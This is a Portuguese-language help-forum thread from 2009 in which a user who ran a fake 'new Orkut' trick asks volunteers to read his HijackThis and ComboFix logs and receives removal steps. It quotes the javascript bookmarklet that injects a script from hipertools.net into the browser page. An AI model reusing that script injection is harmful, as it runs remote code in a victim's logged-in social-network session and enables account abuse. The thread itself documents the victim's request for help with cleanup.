[Resolvido!] Possivel Virus do novo orkut

[AndersonDutra 4]

Em uma comunidade do orkut tinha algumas instruções sobre como acessar o novo orkut. Na hora pensei que fosse virus, mas tinha vários comentários falando que deu certo. Aí resolvi executar o script, parecido com esse:

 

 

javascript:w=document; y=w.createElement('script'); w.body.appendChild(y); y.src='ht'+'tp://hipertools.net/ConvitesOrkut.js';void(0);

 

Aí apareceu uma msg e só! Aí resolvi trocar as senhas de email e orkut por segurança!! E por uma pesquisa rápido ouvi dizer que isso realmente é virus. Acabei caindo no golpe por curiosidade. Então vim aqui pedir para analisarem meu log:

 

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 14:54:13, on 13/11/2009

Platform: Windows XP SP3 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)

Boot mode: Normal

 

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\Arquivos de programas\Alwil Software\Avast4\aswUpdSv.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashServ.exe

C:\WINDOWS\Explorer.EXE

C:\Arquivos de programas\Intel\AMT\atchk.exe

C:\Arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe

C:\Arquivos de programas\Java\jre6\bin\jusched.exe

C:\Arquivos de programas\Analog Devices\Core\smax4pnp.exe

C:\WINDOWS\system32\hkcmd.exe

C:\WINDOWS\system32\igfxpers.exe

C:\WINDOWS\system32\igfxsrvc.exe

C:\WINDOWS\system32\spoolsv.exe

C:\ARQUIV~1\ALWILS~1\Avast4\ashDisp.exe

C:\WINDOWS\system32\ctfmon.exe

C:\Arquivos de programas\Windows Live\Messenger\MsnMsgr.Exe

C:\Arquivos de programas\Skype\Phone\Skype.exe

C:\Arquivos de programas\Messenger\msmsgs.exe

C:\Arquivos de programas\Intel\AMT\atchksrv.exe

C:\Arquivos de programas\Java\jre6\bin\jqs.exe

C:\Arquivos de programas\Intel\AMT\LMS.exe

C:\MATLAB7\webserver\bin\win32\matlabserver.exe

C:\Arquivos de programas\Intel\AMT\UNS.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashMaiSv.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashWebSv.exe

C:\Arquivos de programas\Windows Live\Contacts\wlcomm.exe

C:\WINDOWS\system32\wuauclt.exe

C:\Arquivos de programas\Last.fm\LastFM.exe

C:\Hijack\HiJackThis.exe

 

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar =

 

http://search.live.com/sphome.aspx

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page =

 

http://search.live.com

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =

 

http://go.microsoft.com/fwlink/?LinkId=69157

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =

 

http://search.live.com/sphome.aspx

O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -

 

C:\Arquivos de programas\Arquivos

 

comuns\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll

O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)

O2 - BHO: Auxiliar de Conexão do Windows Live -

 

{9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Arquivos de programas\Arquivos

 

comuns\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

O2 - BHO: Java Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9}

 

- C:\Arquivos de programas\Java\jre6\bin\jp2ssv.dll

O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} -

 

C:\Arquivos de programas\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll

O4 - HKLM\..\Run: [atchk] "C:\Arquivos de programas\Intel\AMT\atchk.exe"

O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe

O4 - HKLM\..\Run: [RemoteControl] "C:\Arquivos de

 

programas\CyberLink\PowerDVD\PDVDServ.exe"

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Arquivos de

 

programas\Java\jre6\bin\jusched.exe"

O4 - HKLM\..\Run: [soundMAXPnP] C:\Arquivos de programas\Analog

 

Devices\Core\smax4pnp.exe

O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\system32\igfxtray.exe

O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe

O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe

O4 - HKLM\..\Run: [Windows Defender] VSFPNC

O4 - HKLM\..\Run: [avast!] C:\ARQUIV~1\ALWILS~1\Avast4\ashDisp.exe

O4 - HKLM\..\Run: [Windows Update SP8] C:\WINDOWS\system32\Windows UpdateSP8.exe

O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Arquivos de

 

programas\Adobe\Reader 9.0\Reader\Reader_sl.exe"

O4 - HKLM\..\Run: [Adobe ARM] "C:\Arquivos de programas\Arquivos

 

comuns\Adobe\ARM\1.0\AdobeARM.exe"

O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe

O4 - HKCU\..\Run: [MsnMsgr] "C:\Arquivos de programas\Windows

 

Live\Messenger\MsnMsgr.Exe" /background

O4 - HKCU\..\Run: [skype] "C:\Arquivos de programas\Skype\Phone\Skype.exe"

 

/nosplash /minimized

O4 - HKCU\..\Run: [MSMSGS] "C:\Arquivos de programas\Messenger\msmsgs.exe"

 

/background

O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User

 

'LOCAL SERVICE')

O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User

 

'NETWORK SERVICE')

O4 - HKUS\S-1-5-21-2052111302-1659004503-839522115-1004\..\Run: [CTFMON.EXE]

 

C:\WINDOWS\system32\CTFMON.EXE (User 'postgres')

O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User

 

'SYSTEM')

O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User

 

'Default user')

O8 - Extra context menu item: E&xportar para o Microsoft Excel -

 

res://C:\ARQUIV~1\MICROS~2\OFFICE11\EXCEL.EXE/3000

O9 - Extra button: Pesquisar - {92780B25-18CC-41C8-B9BE-3C9C571A8263} -

 

C:\ARQUIV~1\MICROS~2\OFFICE11\REFIEBAR.DLL

O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} -

 

C:\WINDOWS\Network Diagnostic\xpnetdiag.exe

O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 -

 

{e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network

 

Diagnostic\xpnetdiag.exe

O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} -

 

C:\Arquivos de programas\Messenger\msmsgs.exe

O9 - Extra 'Tools' menuitem: Windows Messenger -

 

{FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Arquivos de

 

programas\Messenger\msmsgs.exe

O14 - IERESET.INF:

 

SEARCH_PAGE_URL=&http://home.microsoft.com/intl/br/access/allinone.asp

O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) -

 

http://www.update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_

 

site.cab?1235056171250

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) -

 

https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

O17 - HKLM\System\CCS\Services\Tcpip\..\{193A9405-D997-4DAC-9140-CBF971D269BF}:

 

NameServer = 150.163.28.5,150.163.105.9

O17 - HKLM\System\CS1\Services\Tcpip\..\{193A9405-D997-4DAC-9140-CBF971D269BF}:

 

NameServer = 150.163.28.5,150.163.105.9

O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software -

 

C:\Arquivos de programas\Alwil Software\Avast4\aswUpdSv.exe

O23 - Service: Intel® Active Management Technology System Status Service

 

(atchksrv) - Intel Corporation - C:\Arquivos de programas\Intel\AMT\atchksrv.exe

O23 - Service: avast! Antivirus - ALWIL Software - C:\Arquivos de

 

programas\Alwil Software\Avast4\ashServ.exe

O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Arquivos de

 

programas\Alwil Software\Avast4\ashMaiSv.exe

O23 - Service: avast! Web Scanner - ALWIL Software - C:\Arquivos de

 

programas\Alwil Software\Avast4\ashWebSv.exe

O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems,

 

Inc. - C:\Arquivos de programas\Java\jre6\bin\jqs.exe

O23 - Service: Intel® Active Management Technology Local Management Service

 

(LMS) - Intel - C:\Arquivos de programas\Intel\AMT\LMS.exe

O23 - Service: MATLAB Server (matlabserver) - Unknown owner -

 

C:\MATLAB7\webserver\bin\win32\matlabserver.exe

O23 - Service: PostgreSQL Database Server 8.3 (pgsql-8.3) - PostgreSQL Global

 

Development Group - C:\Arquivos de programas\PostgreSQL\8.3\bin\pg_ctl.exe

O23 - Service: Intel® Active Management Technology User Notification Service

 

(UNS) - Intel - C:\Arquivos de programas\Intel\AMT\UNS.exe

 

--

End of file - 7374 bytes

[wings 22]

*Desative temporariamente seu antivírus

 

Clique com o botão direito do mouse no ícone do Avast que fica rodando ao lado do relógio > Selecione "Pausar a proteção residente" > Confirme.

*Baixe o ComboFix e salve-o no desktop

*Feche o Internet Explorer e o Windows Explorer

*Duplo-clique no arquivo Combofix.exe

*Aceite o contrato

*Importante: enquanto o ComboFix estiver em execução, não use o mouse nem o teclado!! Para interromper o procedimento tecle [N]

*O programa será fechado automaticamente

*Cole o relatório criado em C:\combofix.txt

[AndersonDutra 4]

Aí está!! Pelo que vi no orkut, eu fui adicionado contra minha vontade em 3 comunidades!! Espero que esse tenha sido o único mal!!

 

ComboFix 09-11-13.06 - Anderson 13/11/2009 16:39.1.2 - NTFSx86

Microsoft Windows XP Professional 5.1.2600.3.1252.55.1046.18.2021.1362 [GMT -2:00]

Executando de: c:\documents and settings\Anderson\Desktop\ComboFix.exe

AV: avast! antivirus 4.8.1351 [VPS 091113-0] *On-access scanning disabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}

.

 

((((((((((((((((((((((((((((((((((((( Outras Exclusões )))))))))))))))))))))))))))))))))))))))))))))))))))

.

 

c:\docume~1\Anderson\CONFIG~1\Temp\1.wmv

c:\documents and settings\Anderson\Desktop\Introdução_do_HNB.wmv

c:\documents and settings\Anderson\Desktop\Introdução_do_HNB.wmv

c:\windows\WINDOWS

c:\windows\WINDOWS\SYSTEM32\LexFiles.log

c:\windows\WINDOWS\SYSTEM32\lexlog.dlL

c:\windows\WINDOWS\SYSTEM32\LMAAG2BJ.DLL

c:\windows\WINDOWS\SYSTEM32\LMAAG2TH.HLP

c:\windows\WINDOWS\SYSTEM32\Monitor.inf

 

.

(((((((((((((((( Arquivos/Ficheiros criados de 2009-10-13 to 2009-11-13 ))))))))))))))))))))))))))))

.

 

2009-11-13 16:52 . 2009-11-13 16:54 -------- d-----w- C:\Hijack

2009-11-04 12:19 . 2009-11-10 12:43 -------- d-----w- C:\Dado MArcio

2009-10-23 12:47 . 2009-10-23 12:47 -------- d-----w- c:\documents and settings\Anderson\.netbeans-registration

2009-10-23 12:47 . 2009-10-23 12:47 -------- d-----w- c:\documents and settings\Anderson\.netbeans

2009-10-23 12:46 . 2009-10-23 12:46 -------- d-----w- c:\documents and settings\Anderson\.x3deditor32E}

2009-10-23 12:45 . 2009-10-23 12:46 -------- d-----w- C:\X3D-Edit3.2

2009-10-20 13:25 . 2009-10-20 13:25 -------- d-----w- c:\arquivos de programas\Bitmanagement Software

2009-10-20 12:12 . 2009-10-20 14:07 -------- d-----w- c:\windows\SxsCaPendDel

2009-10-19 18:46 . 2009-10-19 18:46 -------- d-----w- c:\arquivos de programas\Microsoft SQL Server

2009-10-19 18:46 . 2009-10-19 18:46 112640 ----a-w- c:\documents and settings\All Users\Dados de aplicativos\Microsoft\VCExpress\9.0\1033\ResourceCache.dll

2009-10-19 18:46 . 2009-10-19 18:46 416 ----a-w- c:\documents and settings\All Users\Dados de aplicativos\Microsoft\MSDN\9.0\1033\ResourceCache.dll

2009-10-19 18:44 . 2009-10-20 12:12 -------- d-----w- c:\documents and settings\All Users\Dados de aplicativos\Microsoft Help

2009-10-19 18:44 . 2009-10-20 12:11 -------- d-----w- c:\arquivos de programas\Microsoft Visual Studio 9.0

2009-10-19 18:44 . 2009-10-19 18:44 -------- d-----w- c:\arquivos de programas\Microsoft SDKs

2009-10-19 18:43 . 2009-10-19 18:43 -------- d-----w- c:\windows\system32\XPSViewer

2009-10-19 18:43 . 2009-10-19 18:43 -------- d-----w- c:\arquivos de programas\MSBuild

2009-10-19 18:43 . 2009-10-19 18:43 -------- d-----w- c:\arquivos de programas\Reference Assemblies

2009-10-19 18:43 . 2008-07-06 12:06 89088 -c----w- c:\windows\system32\dllcache\filterpipelineprintproc.dll

2009-10-19 18:43 . 2008-07-06 12:06 575488 -c----w- c:\windows\system32\dllcache\xpsshhdr.dll

2009-10-19 18:43 . 2008-07-06 12:06 575488 ------w- c:\windows\system32\xpsshhdr.dll

2009-10-19 18:43 . 2008-07-06 12:06 1676288 -c----w- c:\windows\system32\dllcache\xpssvcs.dll

2009-10-19 18:43 . 2008-07-06 12:06 1676288 ------w- c:\windows\system32\xpssvcs.dll

2009-10-19 18:43 . 2008-07-06 12:06 117760 ------w- c:\windows\system32\prntvpt.dll

2009-10-19 18:43 . 2008-07-06 10:50 597504 -c----w- c:\windows\system32\dllcache\printfilterpipelinesvc.exe

 

.

((((((((((((((((((((((((((((((((((((( Relatório Find3M ))))))))))))))))))))))))))))))))))))))))))))))))))))

.

2009-11-13 18:21 . 2009-03-19 18:09 -------- d-----w- c:\documents and settings\Anderson\Dados de aplicativos\Skype

2009-11-13 17:15 . 2009-05-13 14:52 -------- d-----w- c:\documents and settings\Anderson\Dados de aplicativos\EditPlus 3

2009-11-11 12:58 . 2009-03-19 20:18 -------- d-----w- c:\documents and settings\Anderson\Dados de aplicativos\gtk-2.0

2009-11-05 19:45 . 2004-08-04 10:00 80246 ----a-w- c:\windows\system32\perfc016.dat

2009-11-05 19:45 . 2004-08-04 10:00 473318 ----a-w- c:\windows\system32\perfh016.dat

2009-10-21 17:45 . 2009-02-19 14:40 -------- d-----w- c:\arquivos de programas\Arquivos comuns\Adobe

2009-09-25 05:36 . 2006-03-04 03:34 669184 ----a-w- c:\windows\system32\wininet.dll

2009-09-25 05:36 . 2004-08-04 10:00 81920 ----a-w- c:\windows\system32\ieencode.dll

2009-09-11 14:19 . 2004-08-04 10:00 136192 ----a-w- c:\windows\system32\msv1_0.dll

2009-09-11 11:42 . 2009-09-11 11:42 411368 ----a-w- c:\windows\system32\deploytk.dll

2009-09-11 11:42 . 2009-09-11 11:42 152576 ----a-w- c:\documents and settings\Anderson\Dados de aplicativos\Sun\Java\jre1.6.0_15\lzma.dll

2009-09-04 21:04 . 2004-08-04 10:00 58880 ----a-w- c:\windows\system32\msasn1.dll

2009-08-26 08:01 . 2004-08-04 10:00 247326 ----a-w- c:\windows\system32\strmdll.dll

2009-08-17 16:10 . 2009-03-30 13:34 1279456 ----a-w- c:\windows\system32\aswBoot.exe

2009-08-17 16:06 . 2009-03-30 13:34 93392 ----a-w- c:\windows\system32\drivers\aswmon.sys

2009-08-17 16:06 . 2009-03-30 13:34 94160 ----a-w- c:\windows\system32\drivers\aswmon2.sys

2009-08-17 16:05 . 2009-03-30 13:34 114768 ----a-w- c:\windows\system32\drivers\aswSP.sys

2009-08-17 16:05 . 2009-03-30 13:34 20560 ----a-w- c:\windows\system32\drivers\aswFsBlk.sys

2009-08-17 16:04 . 2009-03-30 13:34 51376 ----a-w- c:\windows\system32\drivers\aswTdi.sys

2009-08-17 16:04 . 2009-03-30 13:34 23152 ----a-w- c:\windows\system32\drivers\aswRdr.sys

2009-08-17 16:03 . 2009-03-30 13:34 26944 ----a-w- c:\windows\system32\drivers\aavmker4.sys

2009-08-17 16:02 . 2009-03-30 13:34 97480 ----a-w- c:\windows\system32\AvastSS.scr

.

 

(((((((((((((((((((((((((( Pontos de Carregamento do Registro )))))))))))))))))))))))))))))))))))))))

.

.

*Nota* entradas vazias e legítimas por defeito não são mostradas.

REGEDIT4

 

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"MsnMsgr"="c:\arquivos de programas\Windows Live\Messenger\MsnMsgr.Exe" [2009-02-06 3885408]

"Skype"="c:\arquivos de programas\Skype\Phone\Skype.exe" [2009-03-11 24095528]

"MSMSGS"="c:\arquivos de programas\Messenger\msmsgs.exe" [2008-04-14 1695232]

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Windows Defender"="VSFPNC" [X]

"atchk"="c:\arquivos de programas\Intel\AMT\atchk.exe" [2007-06-12 408344]

"NeroFilterCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]

"RemoteControl"="c:\arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe" [2003-12-08 32768]

"SunJavaUpdateSched"="c:\arquivos de programas\Java\jre6\bin\jusched.exe" [2009-09-11 149280]

"SoundMAXPnP"="c:\arquivos de programas\Analog Devices\Core\smax4pnp.exe" [2007-08-01 1036288]

"IgfxTray"="c:\windows\system32\igfxtray.exe" [2008-05-29 150040]

"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-05-29 170520]

"Persistence"="c:\windows\system32\igfxpers.exe" [2008-05-29 141848]

"avast!"="c:\arquiv~1\ALWILS~1\Avast4\ashDisp.exe" [2009-08-17 81000]

"Adobe Reader Speed Launcher"="c:\arquivos de programas\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2009-10-03 35696]

"Adobe ARM"="c:\arquivos de programas\Arquivos comuns\Adobe\ARM\1.0\AdobeARM.exe" [2009-09-04 935288]

 

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]

"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

 

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]

BootExecute REG_MULTI_SZ masterx autocheck autochk *

 

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]

"%windir%\\system32\\sessmgr.exe"=

"%windir%\\Network Diagnostic\\xpnetdiag.exe"=

"c:\\Arquivos de programas\\Windows Live\\Messenger\\wlcsdk.exe"=

"c:\\Arquivos de programas\\Windows Live\\Messenger\\msnmsgr.exe"=

"c:\\WINDOWS\\pchealth\\helpctr\\binaries\\helpctr.exe"=

"c:\\WINDOWS\\system32\\rtcshare.exe"=

"c:\\Documents and Settings\\Anderson\\Dados de aplicativos\\Macromedia\\Flash Player\\www.macromedia.com\\bin\\octoshape\\octoshape.exe"=

"c:\\Arquivos de programas\\Java\\jdk1.6.0_06\\jre\\bin\\javaw.exe"=

"c:\\Arquivos de programas\\Skype\\Phone\\Skype.exe"=

 

R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [30/3/2009 11:34 114768]

R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [30/3/2009 11:34 20560]

R2 pgsql-8.3;PostgreSQL Database Server 8.3;c:\arquivos de programas\PostgreSQL\8.3\bin\pg_ctl.exe [19/9/2008 04:03 65536]

R2 UNS;Intel® Active Management Technology User Notification Service;c:\arquivos de programas\Intel\AMT\UNS.exe [19/2/2009 11:06 2521880]

 

--- =Outros Serviços/Drivers Na Memória ---

 

*NewlyCreated* - MBR

*Deregistered* - mbr

.

Conteúdo da pasta 'Tarefas Agendadas'

 

2009-11-12 c:\windows\Tasks\AppleSoftwareUpdate.job

- c:\arquivos de programas\Apple Software Update\SoftwareUpdate.exe [2008-07-30 15:34]

 

2009-11-13 c:\windows\Tasks\WGASetup.job

- c:\windows\system32\KB905474\wgasetup.exe [2009-04-28 01:18]

.

.

------- Scan Suplementar -------

.

IE: E&xportar para o Microsoft Excel - c:\arquiv~1\MICROS~2\OFFICE11\EXCEL.EXE/3000

TCP: {193A9405-D997-4DAC-9140-CBF971D269BF} = 150.163.28.5,150.163.105.9

FF - ProfilePath - c:\documents and settings\Anderson\Dados de aplicativos\Mozilla\Firefox\Profiles\e85qkk4c.default\

FF - prefs.js: browser.search.defaulturl - hxxp://search.live.com/results.aspx?FORM=IEFM1&q=

FF - prefs.js: browser.search.selectedEngine - Google

FF - prefs.js: browser.startup.homepage - hxxp://pt-BR.start2.mozilla.com/firefox?client=firefox-a&rls=org.mozilla:pt-BR:official

FF - prefs.js: keyword.URL - hxxp://search.live.com/results.aspx?FORM=IEFM1&q=

FF - plugin: c:\arquivos de programas\Bitmanagement Software\BS Contact\npBSContact.dll

FF - plugin: c:\arquivos de programas\Bitmanagement Software\BS Contact\npBSVersion_6.dll

FF - plugin: c:\arquivos de programas\Mozilla Firefox\plugins\np-mswmp.dll

FF - plugin: c:\arquivos de programas\Mozilla Firefox\plugins\npSwirl3.dll

FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\

 

---- FIREFOX POLICIES ----

c:\arquivos de programas\Mozilla Firefox\defaults\pref\firefox-l10n.js - pref("browser.fixup.alternate.suffix", ".com.br");

.

- - - - ORFÃOS REMOVIDOS - - - -

 

HKLM-Run-Windows Update SP8 - c:\windows\system32\Windows UpdateSP8.exe

 

 

 

**************************************************************************

Procurando processos ocultos ...

 

Procurando entradas auto inicializáveis ocultas ...

 

Procurando ficheiros/arquivos ocultos ...

 

Varredura completada com sucesso

arquivos/ficheiros ocultos:

 

**************************************************************************

.

--------------------- CHAVES DO REGISTRO BLOQUEADAS ---------------------

 

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion\Installer\UserData\LocalSystem\Components\h–€|ÿÿÿÿ¤•€|ù•6~*]

"6140110900063D11C8EF10054038389C"="C?\\WINDOWS\\system32\\FM20ENU.DLL"

.

--------------------- DLLs Carregadas Sob os Processos em Execução ---------------------

 

- - - - - - - > 'explorer.exe'(3936)

c:\windows\system32\WPDShServiceObj.dll

c:\windows\system32\PortableDeviceTypes.dll

c:\windows\system32\PortableDeviceApi.dll

.

------------------------ Outros Processos em Execução ------------------------

.

c:\arquivos de programas\Alwil Software\Avast4\aswUpdSv.exe

c:\arquivos de programas\Alwil Software\Avast4\ashServ.exe

c:\arquivos de programas\Intel\AMT\atchksrv.exe

c:\arquivos de programas\Java\jre6\bin\jqs.exe

c:\arquivos de programas\Intel\AMT\LMS.exe

c:\windows\system32\igfxsrvc.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\PostgreSQL\8.3\bin\postgres.exe

c:\arquivos de programas\Alwil Software\Avast4\ashMaiSv.exe

c:\arquivos de programas\Alwil Software\Avast4\ashWebSv.exe

.

**************************************************************************

.

Tempo para conclusão: 2009-11-13 16:46 - Máquina reiniciou

ComboFix-quarantined-files.txt 2009-11-13 18:45

 

Pré-execução: 15 pasta(s) 40.164.474.880 bytes disponíveis

Pós execução: 19 pasta(s) 40.838.615.040 bytes disponíveis

 

WindowsXP-KB310994-SP2-Pro-BootDisk-PTG.exe

[boot loader]

timeout=2

default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS

[operating systems]

c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons

multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

 

- - End Of File - - BE46A0BA68C6E98BBED97FF5280668DC

[wings 22]

1.

*Execute o hijack, clique em [Do a system scan only], selecione a entrada abaixo e clique em [Fix checked]

 

O4 - HKLM\..\Run: [Windows Defender] VSFPNC

 

2.

*Novo log do hijack

[AndersonDutra 4]

Logfile of Trend Micro HijackThis v2.0.2

Scan saved at 08:37:20, on 16/11/2009

Platform: Windows XP SP3 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)

Boot mode: Normal

 

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\Arquivos de programas\Alwil Software\Avast4\aswUpdSv.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashServ.exe

C:\WINDOWS\Explorer.EXE

C:\Arquivos de programas\Intel\AMT\atchk.exe

C:\Arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe

C:\Arquivos de programas\Java\jre6\bin\jusched.exe

C:\Arquivos de programas\Analog Devices\Core\smax4pnp.exe

C:\WINDOWS\system32\hkcmd.exe

C:\WINDOWS\system32\igfxpers.exe

C:\WINDOWS\system32\spoolsv.exe

C:\ARQUIV~1\ALWILS~1\Avast4\ashDisp.exe

C:\WINDOWS\system32\igfxsrvc.exe

C:\Arquivos de programas\Adobe\Reader 9.0\Reader\Reader_sl.exe

C:\Arquivos de programas\Windows Live\Messenger\MsnMsgr.Exe

C:\Arquivos de programas\Skype\Phone\Skype.exe

C:\Arquivos de programas\Messenger\msmsgs.exe

C:\Arquivos de programas\Intel\AMT\atchksrv.exe

C:\Arquivos de programas\Java\jre6\bin\jqs.exe

C:\Arquivos de programas\Intel\AMT\LMS.exe

C:\Arquivos de programas\Intel\AMT\UNS.exe

C:\WINDOWS\system32\wuauclt.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashMaiSv.exe

C:\Arquivos de programas\Alwil Software\Avast4\ashWebSv.exe

C:\Hijack\HiJackThis.exe

 

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896

O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Arquivos de programas\Arquivos comuns\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll

O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)

O2 - BHO: Auxiliar de Conexão do Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Arquivos de programas\Arquivos comuns\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

O2 - BHO: Java Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Arquivos de programas\Java\jre6\bin\jp2ssv.dll

O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Arquivos de programas\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll

O4 - HKLM\..\Run: [atchk] "C:\Arquivos de programas\Intel\AMT\atchk.exe"

O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe

O4 - HKLM\..\Run: [RemoteControl] "C:\Arquivos de programas\CyberLink\PowerDVD\PDVDServ.exe"

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Arquivos de programas\Java\jre6\bin\jusched.exe"

O4 - HKLM\..\Run: [soundMAXPnP] C:\Arquivos de programas\Analog Devices\Core\smax4pnp.exe

O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\system32\igfxtray.exe

O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe

O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe

O4 - HKLM\..\Run: [avast!] C:\ARQUIV~1\ALWILS~1\Avast4\ashDisp.exe

O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Arquivos de programas\Adobe\Reader 9.0\Reader\Reader_sl.exe"

O4 - HKLM\..\Run: [Adobe ARM] "C:\Arquivos de programas\Arquivos comuns\Adobe\ARM\1.0\AdobeARM.exe"

O4 - HKCU\..\Run: [MsnMsgr] "C:\Arquivos de programas\Windows Live\Messenger\MsnMsgr.Exe" /background

O4 - HKCU\..\Run: [skype] "C:\Arquivos de programas\Skype\Phone\Skype.exe" /nosplash /minimized

O4 - HKCU\..\Run: [MSMSGS] "C:\Arquivos de programas\Messenger\msmsgs.exe" /background

O4 - HKUS\S-1-5-21-2052111302-1659004503-839522115-1004\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'postgres')

O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')

